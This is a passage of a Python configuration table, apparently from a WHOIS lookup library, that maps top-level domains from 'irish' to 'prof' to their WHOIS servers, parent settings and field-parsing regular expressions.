R(r\"\\nRegistry Expiry Date:\\s?(.+)\")}\nZZ[\"irish\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ismaili\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"istanbul\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ist\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"itv\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"jaguar\"] = {\"_server\": \"whois.nic.jaguar\", \"extend\": \"com\", \"_test\": \"nic.jaguar\"}\nZZ[\"java\"] = {\"_server\": \"whois.nic.java\", \"extend\": \"com\", \"_test\": \"nic.java\"}\nZZ[\"jcb\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"jeep\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"je\"] = {\"extend\": \"gg\"}\nZZ[\"jetzt\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"jewelry\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"jio\"] = {\"_server\": \"whois.nic.jio\", \"extend\": \"com\", \"_test\": \"nic.jio\"}\nZZ[\"jll\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"jobs\"] = {\"_server\": \"whois.nic.jobs\", \"extend\": \"com\", \"_test\": \"nic.jobs\"}\nZZ[\"joburg\"] = {\"_server\": \"whois.nic.joburg\", \"extend\": \"com\", \"_test\": \"nic.joburg\"}\nZZ[\"jot\"] = {\"_server\": \"whois.nic.jot\", \"extend\": \"com\", \"_test\": \"nic.jot\"}\nZZ[\"joy\"] = {\"_server\": \"whois.nic.joy\", \"extend\": \"com\", \"_test\": \"nic.joy\"}\nZZ[\"juegos\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"juniper\"] = {\"_server\": \"whois.nic.juniper\", \"extend\": \"com\", \"_test\": \"nic.juniper\"}\nZZ[\"kaufen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"kddi\"] = {\"_server\": \"whois.nic.kddi\", \"extend\": \"com\", \"_test\": \"nic.kddi\"}\nZZ[\"ke\"] = {\"extend\": \"com\", \"_server\": \"whois.kenic.or.ke\"}\nZZ[\"kerryhotels\"] = {\"_server\": \"whois.nic.kerryhotels\", \"extend\": \"com\", \"_test\": \"nic.kerryhotels\"}\nZZ[\"kerrylogistics\"] = {\"_server\": \"whois.nic.kerrylogistics\", \"extend\": \"com\", \"_test\": \"nic.kerrylogistics\"}\nZZ[\"kerryproperties\"] = {\"_server\": \"whois.nic.kerryproperties\", \"extend\": \"com\", \"_test\": \"nic.kerryproperties\"}\nZZ[\"kfh\"] = {\"_server\": \"whois.nic.kfh\", \"extend\": \"com\", \"_test\": \"nic.kfh\"}\nZZ[\"kia\"] = {\"_server\": \"whois.nic.kia\", \"extend\": \"com\", \"_test\": \"nic.kia\"}\nZZ[\"kids\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ki\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ki\", \"_test\": None} # kiribati never answeres, timout is the normal response\nZZ[\"kim\"] = {\"_server\": \"whois.nic.kim\", \"extend\": \"com\", \"_test\": \"nic.kim\"}\nZZ[\"kindle\"] = {\"_server\": \"whois.nic.kindle\", \"extend\": \"com\", \"_test\": \"nic.kindle\"}\nZZ[\"kitchen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"kiwi\"] = {\"extend\": \"com\"}\nZZ[\"kn\"] = {\"extend\": \"com\"} # Saint Kitts and Nevis\nZZ[\"koeln\"] = {\"_server\": \"whois.ryce-rsp.com\", \"extend\": \"com\"}\nZZ[\"komatsu\"] = {\"_server\": \"whois.nic.komatsu\", \"extend\": \"com\", \"_test\": \"nic.komatsu\"}\nZZ[\"kosher\"] = {\"_server\": \"whois.nic.kosher\", \"extend\": \"com\", \"_test\": \"nic.kosher\"}\nZZ[\"krd\"] = {\"_server\": \"whois.nic.krd\", \"extend\": \"com\", \"_test\": \"nic.krd\"}\nZZ[\"kred\"] = {\"extend\": \"_centralnic\", \"_server\": 
\"whois.centralnic.com\"}\nZZ[\"kuokgroup\"] = {\"_server\": \"whois.nic.kuokgroup\", \"extend\": \"com\", \"_test\": \"nic.kuokgroup\"}\nZZ[\"kyoto\"] = {\"_server\": \"whois.nic.kyoto\", \"extend\": \"com\", \"_test\": \"nic.kyoto\"}\nZZ[\"ky\"] = {\"_server\": \"whois.kyregistry.ky\", \"extend\": \"com\"}\nZZ[\"lacaixa\"] = {\"_server\": \"whois.nic.lacaixa\", \"extend\": \"com\", \"_test\": \"nic.lacaixa\"}\nZZ[\"la\"] = {\"extend\": \"com\"}\nZZ[\"lamborghini\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"lamer\"] = {\"_server\": \"whois.nic.lamer\", \"extend\": \"com\", \"_test\": \"nic.lamer\"}\nZZ[\"lancaster\"] = {\"_server\": \"whois.nic.lancaster\", \"extend\": \"com\", \"_test\": \"nic.lancaster\"}\nZZ[\"land\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"landrover\"] = {\"_server\": \"whois.nic.landrover\", \"extend\": \"com\", \"_test\": \"nic.landrover\"}\nZZ[\"lasalle\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"lat\"] = {\"extend\": \"com\"}\nZZ[\"latino\"] = {\"_server\": \"whois.nic.latino\", \"extend\": \"com\", \"_test\": \"nic.latino\"}\nZZ[\"latrobe\"] = {\"_server\": \"whois.nic.latrobe\", \"extend\": \"com\", \"_test\": \"nic.latrobe\"}\nZZ[\"law\"] = {\"_server\": \"whois.nic.law\", \"extend\": \"com\", \"_test\": \"nic.law\"}\nZZ[\"lawyer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lb\"] = {\"_server\": \"whois.lbdr.org.lb\", \"extend\": \"com\"}\nZZ[\"lc\"] = {\"extend\": \"com\", \"_server\": \"whois2.afilias-grs.net\"}\nZZ[\"lds\"] = {\"_server\": \"whois.nic.lds\", \"extend\": \"com\", \"_test\": \"nic.lds\"}\nZZ[\"lease\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"leclerc\"] = {\"_server\": \"whois.nic.leclerc\", \"extend\": \"com\", \"_test\": \"nic.leclerc\"}\nZZ[\"lefrak\"] = {\"_server\": \"whois.nic.lefrak\", \"extend\": \"com\", \"_test\": \"nic.lefrak\"}\nZZ[\"legal\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lego\"] = {\"_server\": \"whois.nic.lego\", \"extend\": \"com\", \"_test\": \"nic.lego\"}\nZZ[\"lexus\"] = {\"_server\": \"whois.nic.lexus\", \"extend\": \"com\", \"_test\": \"nic.lexus\"}\nZZ[\"lgbt\"] = {\"_server\": \"whois.nic.lgbt\", \"extend\": \"com\", \"_test\": \"nic.lgbt\"}\nZZ[\"lg.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"lidl\"] = {\"_server\": \"whois.nic.lidl\", \"extend\": \"com\", \"_test\": \"nic.lidl\"}\nZZ[\"li\"] = {\"extend\": \"_privateReg\"}\nZZ[\"life\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lifestyle\"] = {\"_server\": \"whois.nic.lifestyle\", \"extend\": \"com\", \"_test\": \"nic.lifestyle\"}\nZZ[\"lighting\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"like\"] = {\"_server\": \"whois.nic.like\", \"extend\": \"com\", \"_test\": \"nic.like\"}\nZZ[\"limited\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"limo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"link\"] = {\"extend\": \"amsterdam\"}\nZZ[\"lipsy\"] = {\"_server\": \"whois.nic.lipsy\", \"extend\": \"com\", \"_test\": \"nic.lipsy\"}\nZZ[\"live\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lk\"] = {\"extend\": \"_privateReg\"} # Sri Lanka\nZZ[\"llc\"] = {\"_server\": \"whois.nic.llc\", \"extend\": \"com\", \"_test\": \"nic.llc\"}\nZZ[\"llp\"] = {\"_server\": \"whois.nic.llp\", \"extend\": \"com\", \"_test\": \"nic.llp\"}\nZZ[\"loan\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.loan\", 
\"_test\": \"nic.loan\"}\nZZ[\"loans\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"locker\"] = {\"_server\": \"whois.nic.locker\", \"extend\": \"com\", \"_test\": \"nic.locker\"}\nZZ[\"locus\"] = {\"_server\": \"whois.nic.locus\", \"extend\": \"com\", \"_test\": \"nic.locus\"}\nZZ[\"lol\"] = {\"extend\": \"amsterdam\"}\nZZ[\"london\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"lotte\"] = {\"_server\": \"whois.nic.lotte\", \"extend\": \"com\", \"_test\": \"nic.lotte\"}\nZZ[\"lotto\"] = {\"_server\": \"whois.nic.lotto\", \"extend\": \"com\", \"_test\": \"nic.lotto\"}\nZZ[\"love\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"lplfinancial\"] = {\"_server\": \"whois.nic.lplfinancial\", \"extend\": \"com\", \"_test\": \"nic.lplfinancial\"}\nZZ[\"lpl\"] = {\"_server\": \"whois.nic.lpl\", \"extend\": \"com\", \"_test\": \"nic.lpl\"}\nZZ[\"ls\"] = {\"extend\": \"cz\", \"_server\": \"whois.nic.ls\", \"_test\": \"nic.ls\"}\nZZ[\"ltda\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ltd\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lundbeck\"] = {\"_server\": \"whois.nic.lundbeck\", \"extend\": \"com\", \"_test\": \"nic.lundbeck\"}\nZZ[\"luxe\"] = {\"_server\": \"whois.nic.luxe\", \"extend\": \"com\", \"_test\": \"nic.luxe\"}\nZZ[\"luxury\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"lviv.ua\"] = {\"extend\": \"com\"}\nZZ[\"ly\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.ly\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\"), \"_test\": \"nic.ly\"}\nZZ[\"madrid\"] = {\"_server\": \"whois.nic.madrid\", \"extend\": \"com\", \"_test\": \"nic.madrid\"}\nZZ[\"ma\"] = {\"extend\": \"ac\", \"_server\": \"whois.registre.ma\", \"registrar\": R(r\"Sponsoring Registrar:\\s*(.+)\")}\nZZ[\"maison\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"makeup\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"management\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mango\"] = {\"_server\": \"whois.nic.mango\", \"extend\": \"com\", \"_test\": \"nic.mango\"}\nZZ[\"man\"] = {\"_server\": \"whois.nic.man\", \"extend\": \"com\", \"_test\": \"nic.man\"}\nZZ[\"map\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"market\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"marketing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"markets\"] = {\"_server\": \"whois.nic.markets\", \"extend\": \"com\", \"_test\": \"nic.markets\"}\nZZ[\"marriott\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"mba\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mckinsey\"] = {\"_server\": \"whois.nic.mckinsey\", \"extend\": \"com\", \"_test\": \"nic.mckinsey\"}\nZZ[\"media\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"med\"] = {\"_server\": \"whois.nic.med\", \"extend\": \"com\", \"_test\": \"nic.med\"}\nZZ[\"meet\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"me.ke\"] = {\"extend\": \"ke\"}\nZZ[\"melbourne\"] = {\"_server\": \"whois.nic.melbourne\", \"extend\": \"com\", \"_test\": \"nic.melbourne\"}\nZZ[\"meme\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"memorial\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"men\"] = {\"_server\": \"whois.nic.men\", \"extend\": \"com\", 
\"_test\": \"nic.men\"}\nZZ[\"menu\"] = {\"_server\": \"whois.nic.menu\", \"extend\": \"com\", \"_test\": \"nic.menu\"}\nZZ[\"mg\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"miami\"] = {\"_server\": \"whois.nic.miami\", \"extend\": \"com\", \"_test\": \"nic.miami\"}\nZZ[\"mil.rw\"] = {\"extend\": \"rw\"}\nZZ[\"mini\"] = {\"_server\": \"whois.nic.mini\", \"extend\": \"com\", \"_test\": \"nic.mini\"}\nZZ[\"mit\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"mitsubishi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"mls\"] = {\"_server\": \"whois.nic.mls\", \"extend\": \"com\", \"_test\": \"nic.mls\"}\nZZ[\"mma\"] = {\"_server\": \"whois.nic.mma\", \"extend\": \"com\", \"_test\": \"nic.mma\"}\nZZ[\"mn\"] = {\"extend\": \"com\"}\nZZ[\"mn\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.mn\", \"_test\": \"nic.mn\"}\nZZ[\"mobi\"] = {\"extend\": \"com\", \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"), \"updated_date\": R(r\"\\nUpdated Date:\\s?(.+)\")}\nZZ[\"mobi.ke\"] = {\"extend\": \"ke\"}\nZZ[\"mobile\"] = {\"_server\": \"whois.nic.mobile\", \"extend\": \"com\", \"_test\": \"nic.mobile\"}\nZZ[\"moda\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"moe\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"moi\"] = {\"_server\": \"whois.nic.moi\", \"extend\": \"com\", \"_test\": \"nic.moi\"}\nZZ[\"mom\"] = {\"_server\": \"whois.nic.mom\", \"extend\": \"com\", \"_test\": \"nic.mom\"}\nZZ[\"monash\"] = {\"_server\": \"whois.nic.monash\", \"extend\": \"com\", \"_test\": \"nic.monash\"}\nZZ[\"money\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"monster\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"mormon\"] = {\"_server\": \"whois.nic.mormon\", \"extend\": \"com\", \"_test\": \"nic.mormon\"}\nZZ[\"mortgage\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"moscow\"] = {\"_server\": \"whois.nic.moscow\", \"extend\": \"com\", \"_test\": \"nic.moscow\"}\nZZ[\"motorcycles\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"mov\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"movie\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mp\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mq\"] = {\"extend\": \"si\", \"_server\": \"whois.mediaserv.net\"}\nZZ[\"mr\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"com\", \"_test\": \"nic.mr\"}\nZZ[\"msk.ru\"] = {\"extend\": \"com.ru\"} # test with: mining.msk.ru\n# ZZ[\"ms\"] = {\"_server\": \"whois.nic.ms\", \"extend\": \"com\", \"_test\": \"nic.ms\"} # whois.nic.ms does not exist\nZZ[\"ms\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mtn\"] = {\"_server\": \"whois.nic.mtn\", \"extend\": \"com\", \"_test\": \"nic.mtn\"}\nZZ[\"mtr\"] = {\"_server\": \"whois.nic.mtr\", \"extend\": \"com\", \"_test\": \"nic.mtr\"}\nZZ[\"mu\"] = {\"extend\": \"bank\"}\nZZ[\"mu\"] = {\"extend\": \"bank\"}\nZZ[\"museum\"] = {\"_server\": \"whois.nic.museum\", \"extend\": \"com\", \"_test\": \"nic.museum\"}\nZZ[\"music\"] = {\"_server\": \"whois.nic.music\", \"extend\": \"com\", \"_test\": \"nic.music\"}\nZZ[\"my\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mz\"] = {\"_server\": \"whois.nic.mz\", \"extend\": \"com\", \"_test\": \"nic.mz\"}\nZZ[\"nab\"] = {\"_server\": \"whois.nic.nab\", \"extend\": \"com\", \"_test\": \"nic.nab\"}\nZZ[\"nagoya\"] = {\"_server\": \"whois.nic.nagoya\", 
\"extend\": \"com\", \"_test\": \"nic.nagoya\"}\nZZ[\"name\"] = {\"extend\": \"com\", \"status\": R(r\"Domain Status:\\s?(.+)\")}\nZZ[\"na\"] = {\"_server\": \"whois.na-nic.com.na\", \"extend\": \"com\"}\nZZ[\"natura\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"navy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nec\"] = {\"_server\": \"whois.nic.nec\", \"extend\": \"com\", \"_test\": \"nic.nec\"}\nZZ[\"ne.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"ne.ke\"] = {\"extend\": \"ke\"}\nZZ[\"netbank\"] = {\"_server\": \"whois.nic.netbank\", \"extend\": \"com\", \"_test\": \"nic.netbank\"}\nZZ[\"net.bd\"] = {\"extend\": \"bd\"}\nZZ[\"net\"] = {\"extend\": \"com\"}\nZZ[\"net.ph\"] = {\"extend\": \"ph\"}\nZZ[\"net.rw\"] = {\"extend\": \"rw\"}\nZZ[\"net.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"trt.net.tr\"}\nZZ[\"net.ua\"] = {\"extend\": \"ua\"}\nZZ[\"net.ve\"] = {\"extend\": \"ve\"}\nZZ[\"network\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"net.za\"] = {\"extend\": \"za\", \"_server\": \"net-whois.registry.net.za\"}\nZZ[\"new\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"news\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nextdirect\"] = {\"_server\": \"whois.nic.nextdirect\", \"extend\": \"com\", \"_test\": \"nic.nextdirect\"}\nZZ[\"next\"] = {\"_server\": \"whois.nic.next\", \"extend\": \"com\", \"_test\": \"nic.next\"}\nZZ[\"nexus\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"nf\"] = {\"_server\": \"whois.nic.nf\", \"extend\": \"com\", \"_test\": \"nic.nf\"}\nZZ[\"ngo\"] = {\"_server\": \"whois.nic.ngo\", \"extend\": \"com\", \"_test\": \"nic.ngo\"}\nZZ[\"ng\"] = {\"_server\": \"whois.nic.net.ng\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"nhk\"] = {\"_server\": \"whois.nic.nhk\", \"extend\": \"com\", \"_test\": \"nic.nhk\"}\nZZ[\"nico\"] = {\"_server\": \"whois.nic.nico\", \"extend\": \"com\", \"_test\": \"nic.nico\"}\nZZ[\"nikon\"] = {\"_server\": \"whois.nic.nikon\", \"extend\": \"com\", \"_test\": \"nic.nikon\"}\nZZ[\"ninja\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nissan\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"nissay\"] = {\"_server\": \"whois.nic.nissay\", \"extend\": \"com\", \"_test\": \"nic.nissay\"}\nZZ[\"noip.com\"] = {\"extend\": \"_privateReg\"}\nZZ[\"noip.org\"] = {\"extend\": \"_privateReg\"}\nZZ[\"nokia\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"norton\"] = {\"_server\": \"whois.nic.norton\", \"extend\": \"com\", \"_test\": \"nic.norton\"}\nZZ[\"nowruz\"] = {\"_server\": \"whois.nic.nowruz\", \"extend\": \"com\", \"_test\": \"nic.nowruz\"}\nZZ[\"now\"] = {\"_server\": \"whois.nic.now\", \"extend\": \"com\", \"_test\": \"nic.now\"}\nZZ[\"nowtv\"] = {\"_server\": \"whois.nic.nowtv\", \"extend\": \"com\", \"_test\": \"nic.nowtv\"}\nZZ[\"np\"] = {\"extend\": \"_privateReg\"}\nZZ[\"nra\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"nrw\"] = {\"extend\": \"com\"}\nZZ[\"nu\"] = {\"extend\": \"se\"}\nZZ[\"obi\"] = {\"_server\": \"whois.nic.obi\", \"extend\": \"com\", \"_test\": \"nic.obi\"}\nZZ[\"observer\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.observer\", \"_test\": \"nic.observer\"}\nZZ[\"okinawa\"] = {\"_server\": \"whois.nic.okinawa\", \"extend\": \"com\", \"_test\": \"nic.okinawa\"}\nZZ[\"olayangroup\"] = {\"_server\": 
\"whois.nic.olayangroup\", \"extend\": \"com\", \"_test\": \"nic.olayangroup\"}\nZZ[\"olayan\"] = {\"_server\": \"whois.nic.olayan\", \"extend\": \"com\", \"_test\": \"nic.olayan\"}\nZZ[\"ollo\"] = {\"_server\": \"whois.nic.ollo\", \"extend\": \"com\", \"_test\": \"nic.ollo\"}\nZZ[\"omega\"] = {\"_server\": \"whois.nic.omega\", \"extend\": \"com\", \"_test\": \"nic.omega\"}\nZZ[\"om\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"com\", \"_test\": \"registry.om\"}\nZZ[\"one\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.one\", \"_test\": \"nic.one\"}\nZZ[\"ong\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"onl\"] = {\"extend\": \"com\"}\nZZ[\"online\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ooo\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"oracle\"] = {\"_server\": \"whois.nic.oracle\", \"extend\": \"com\", \"_test\": \"nic.oracle\"}\nZZ[\"orange\"] = {\"_server\": \"whois.nic.orange\", \"extend\": \"com\", \"_test\": \"nic.orange\"}\nZZ[\"organic\"] = {\"_server\": \"whois.nic.organic\", \"extend\": \"com\", \"_test\": \"nic.organic\"}\nZZ[\"org.ph\"] = {\"extend\": \"ph\"}\nZZ[\"org.rw\"] = {\"extend\": \"rw\"}\nZZ[\"org.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"dergipark.org.tr\"}\nZZ[\"org.uk\"] = {\"extend\": \"co.uk\"}\nZZ[\"org.ve\"] = {\"extend\": \"ve\"}\nZZ[\"org.za\"] = {\"extend\": \"za\", \"_server\": \"org-whois.registry.net.za\"}\nZZ[\"org.zw\"] = {\"extend\": \"zw\"}\nZZ[\"origins\"] = {\"_server\": \"whois.nic.origins\", \"extend\": \"com\", \"_test\": \"nic.origins\"}\nZZ[\"or.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"or.ke\"] = {\"extend\": \"ke\"}\nZZ[\"osaka\"] = {\"_server\": \"whois.nic.osaka\", \"extend\": \"com\", \"_test\": \"nic.osaka\"}\nZZ[\"otsuka\"] = {\"_server\": \"whois.nic.otsuka\", \"extend\": \"com\", \"_test\": \"nic.otsuka\"}\nZZ[\"ott\"] = {\"_server\": \"whois.nic.ott\", \"extend\": \"com\", \"_test\": \"nic.ott\"}\nZZ[\"ovh\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ovh\", \"_test\": \"nic.ovh\"}\nZZ[\"page\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"panasonic\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"pa\"] = {\"_privateRegistry\": True}\nZZ[\"paris\"] = {\"_server\": \"whois.nic.paris\", \"extend\": \"com\", \"_test\": \"nic.paris\"}\nZZ[\"pars\"] = {\"_server\": \"whois.nic.pars\", \"extend\": \"com\", \"_test\": \"nic.pars\"}\nZZ[\"partners\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"parts\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"party\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.party\", \"_test\": \"nic.party\"}\nZZ[\"pay\"] = {\"_server\": \"whois.nic.pay\", \"extend\": \"com\", \"_test\": \"nic.pay\"}\nZZ[\"pccw\"] = {\"_server\": \"whois.nic.pccw\", \"extend\": \"com\", \"_test\": \"nic.pccw\"}\nZZ[\"pe\"] = {\"extend\": \"com\", \"registrant\": R(r\"Registrant Name:\\s?(.+)\"), \"admin\": R(r\"Admin Name:\\s?(.+)\")}\nZZ[\"pet\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"phd\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"ph\"] = {\"extend\": \"_privateReg\"}\nZZ[\"ph\"] = {\"extend\": \"_privateReg\"}\nZZ[\"philips\"] = {\"_server\": \"whois.nic.philips\", \"extend\": \"com\", \"_test\": \"nic.philips\"}\nZZ[\"phone\"] = {\"_server\": \"whois.nic.phone\", \"extend\": \"com\", \"_test\": 
\"nic.phone\"}\nZZ[\"photo\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"photography\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"photos\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"physio\"] = {\"_server\": \"whois.nic.physio\", \"extend\": \"com\", \"_test\": \"nic.physio\"}\nZZ[\"pics\"] = {\"extend\": \"ac\"}\nZZ[\"pictures\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pid\"] = {\"_server\": \"whois.nic.pid\", \"extend\": \"com\", \"_test\": \"nic.pid\"}\nZZ[\"pink\"] = {\"_server\": \"whois.nic.pink\", \"extend\": \"com\", \"_test\": \"nic.pink\"}\nZZ[\"pin\"] = {\"_server\": \"whois.nic.pin\", \"extend\": \"com\", \"_test\": \"nic.pin\"}\nZZ[\"pioneer\"] = {\"_server\": \"whois.nic.pioneer\", \"extend\": \"com\", \"_test\": \"nic.pioneer\"}\nZZ[\"pizza\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pk\"] = {\"extend\": \"_privateReg\"}\nZZ[\"place\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"play\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"playstation\"] = {\"_server\": \"whois.nic.playstation\", \"extend\": \"com\", \"_test\": \"nic.playstation\"}\nZZ[\"plumbing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"plus\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pm\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.pm\", \"_test\": \"nic.pm\"}\nZZ[\"pnc\"] = {\"_server\": \"whois.nic.pnc\", \"extend\": \"com\", \"_test\": \"nic.pnc\"}\nZZ[\"pohl\"] = {\"_server\": \"whois.nic.pohl\", \"extend\": \"com\", \"_test\": \"nic.pohl\"}\nZZ[\"poker\"] = {\"_server\": \"whois.nic.poker\", \"extend\": \"com\", \"_test\": \"nic.poker\"}\nZZ[\"politie\"] = {\"_server\": \"whois.nic.politie\", \"extend\": \"com\", \"_test\": \"nic.politie\"}\nZZ[\"porn\"] = {\"_server\": \"whois.nic.porn\", \"extend\": \"com\", \"_test\": \"nic.porn\"}\nZZ[\"press\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"prime\"] = {\"_server\": \"whois.nic.prime\", \"extend\": \"com\", \"_test\": \"nic.prime\"}\nZZ[\"prod\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"productions\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pro\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.pro\", \"_test\": \"nic.pro\"}\nZZ[\"prof\"] = {\"extend\": \"com\", 